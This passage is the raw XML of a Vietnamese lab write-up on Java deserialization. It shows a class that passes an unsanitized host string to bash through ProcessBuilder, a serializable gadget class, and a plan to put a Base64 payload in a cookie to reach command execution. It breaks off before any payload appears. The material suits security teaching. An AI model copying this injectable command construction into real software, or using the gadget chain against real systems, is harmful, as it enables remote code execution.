            <w:r w:rsidRPr="0041729F">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3682FF92" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A935735" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61857DEB" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="593C8F44" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0350F6F4" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="541E9A8C" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="351BD7A3" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="082C4C7A" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="267EAA01" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>26</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="644CBF5A" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>27</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="147753F7" w14:textId="66AC1C2A" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40DCEDB7" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>public class MyHTTPClient extends HTTPConnection {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50C6C4DB" w14:textId="7923F37B" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">    private String host;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="747AD49B" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">    public MyHTTPClient(String host)  {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="273B305A" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">        super("http://" + host);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24BAB1DB" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">        this.host = host;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A5A699D" w14:textId="7340B0B7" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7992AC4F" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">    public void sendRequest() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AE951B5" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">        String path = "/bin/bash";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33F03BBC" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">        ProcessBuilder pb = new ProcessBuilder(path, "-c", "curl " + this.host);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="223070DE" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">        try {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3766B8C2" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">            Process curlProcess = pb.start();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ACAC895" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">        } catch (IOException e) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="507E01BA" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">            e.printStackTrace();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D151151" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="279189C1" w14:textId="13C84037" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="155E65F1" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">    @Override</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61798433" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">    public void connect() throws IOException, InterruptedException {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DD17478" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">        // Test connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="376DCE33" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">        String path = "/bin/bash";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A8C539F" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">        ProcessBuilder pb = new ProcessBuilder(path, "-c", "ping " + this.host);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4470AD1D" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">        Process ping = pb.start();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31AE0DC6" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">        int exitCode = ping.waitFor();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D532F68" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">        // TODO: add implement for exitCode check</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11207B0B" w14:textId="04542878" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54C4943E" w14:textId="77777777" w:rsidR="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">    private void readObject(ObjectInputStream in) throws IOException, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="261D03D4" w14:textId="4D4E6D51" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>ClassNotFoundException {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C1AE3A8" w14:textId="2BA136B2" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">        in.defaultReadObject();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E9C8165" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="751CBF9A" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44F91EE5" w14:textId="09AD8187" w:rsidR="0041729F" w:rsidRDefault="00536281" w:rsidP="00536281">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ở mục tiêu 3 này, class </w:t>
      </w:r>
      <w:r w:rsidRPr="0041729F">
        <w:t>MyHTTPClient</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> đã được thay đổi ở hàm readObject (magic method thực hiện khai thác ở bài trước) bằng cách sử dụng hàm ReadObject mặc định của java. Điều này khiến cho việc khai thác bằng hàm này đã trở lên bất khả thi. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE51957" w14:textId="56B3B78D" w:rsidR="009D2055" w:rsidRDefault="009D2055" w:rsidP="00536281">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tuy nhiên bài lab này lại có thêm 1 class mới là class TestConnection:</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071482" w:rsidRPr="00071482" w14:paraId="79879407" w14:textId="77777777" w:rsidTr="00071482">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42657231" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48DA993E" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0535B864" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78EF9823" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AAC5F51" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61D16FC7" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ABA1ED4" w14:textId="77777777" w:rsidR="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F02251E" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="113D7652" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DF0F051" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F404D09" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00D8249F" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F018CC6" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79827DCA" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E20AF7D" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t>public class TestConnection implements Serializable {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66F900AF" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t xml:space="preserve">    public HTTPConnection connection;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="799C3534" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t xml:space="preserve">    public TestConnection(HTTPConnection connection) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78B200DA" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t xml:space="preserve">        this.connection = connection;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FD799DD" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D369810" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71401B16" w14:textId="77777777" w:rsidR="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t xml:space="preserve">    private void readObject(ObjectInputStream in) throws IOException, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6274836A" w14:textId="724C3953" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t>ClassNotFoundException, InterruptedException {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AE25F0A" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t xml:space="preserve">        in.defaultReadObject();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4964BAD4" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t xml:space="preserve">        // Re-create the connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="386039B2" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t xml:space="preserve">        this.connection.connect();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E9243F8" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C4666EC" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23E73FCE" w14:textId="77777777" w:rsidR="00071482" w:rsidRPr="00071482" w:rsidRDefault="00071482" w:rsidP="00071482">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00071482">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52F76B1A" w14:textId="05CAB819" w:rsidR="00071482" w:rsidRDefault="009D2055" w:rsidP="003A3836">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Class này</w:t>
      </w:r>
      <w:r w:rsidR="00AE5F1F">
        <w:t xml:space="preserve"> khai báo </w:t>
      </w:r>
      <w:r w:rsidR="003A3836">
        <w:t>trực tiếp đối tượng connection kiểu</w:t>
      </w:r>
      <w:r w:rsidR="00AE5F1F">
        <w:t xml:space="preserve"> HTTPConnection</w:t>
      </w:r>
      <w:r w:rsidR="003A3836">
        <w:t xml:space="preserve"> làm thuộc tính, nó </w:t>
      </w:r>
      <w:r w:rsidR="003A3836" w:rsidRPr="003A3836">
        <w:t>có thể tham chiếu đến bất kỳ lớp con hợp lệ như My</w:t>
      </w:r>
      <w:r w:rsidR="00EA3E75">
        <w:t xml:space="preserve">HTTPClient. Class sử dụng constructor để nhận giá trị khởi tạo từ bên ngoài và sử dụng magic method readObject như các bài trước. Trong đó có sử dụng </w:t>
      </w:r>
      <w:r w:rsidR="00B07A7B">
        <w:t xml:space="preserve">ReadObject default tương tự </w:t>
      </w:r>
      <w:r w:rsidR="00E50EF7">
        <w:t>MyHTTPClient nhưng lại gọi this.</w:t>
      </w:r>
      <w:r w:rsidR="00BB5456">
        <w:t>connection.connect().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C9DE9A" w14:textId="77777777" w:rsidR="009D2055" w:rsidRDefault="009D2055" w:rsidP="009D2055">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F212E9" w14:textId="158DCF5F" w:rsidR="00BB5456" w:rsidRPr="00BB5456" w:rsidRDefault="00BB5456" w:rsidP="00BB5456">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB5456">
        <w:t xml:space="preserve">Thực hiện bằng cách tạo một payload chứa một </w:t>
      </w:r>
      <w:r w:rsidR="00E9616E">
        <w:t>đối tượng</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5456">
        <w:t xml:space="preserve"> của lớp TestConnection, trong đó trường connection được gán là một đối tượng MyHTTPClient với thuộc tính host được thiết lập phù hợp. Payload này sau khi được tuần tự hóa và mã hóa Base64 sẽ được chèn vào cookie user. Khi ứng dụng tiến hành deserialize dữ liệu cookie, Java sẽ khôi phục đúng class thực tế (TestConnection) và tự động gọi phương thức đặc biệt readObject. Trong quá trình khôi phục, readObject sẽ gọi this.connection.connect(), dẫn đến việc thực thi đoạn mã sử dụng ProcessBuilder để thực hiện lệnh hệ thống ping tới địa chỉ host do người dùng kiểm soát. Đây là điểm khai thác gián tiếp thông qua chuỗi đối tượng, cho phép thực thi tiến trình hệ thống mà không cần override readObject trong MyHTTPClient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69282D1A" w14:textId="77777777" w:rsidR="009D2055" w:rsidRPr="00184ED1" w:rsidRDefault="009D2055" w:rsidP="009D2055">
      <w:pPr>
        <w:jc w:val="both"/>
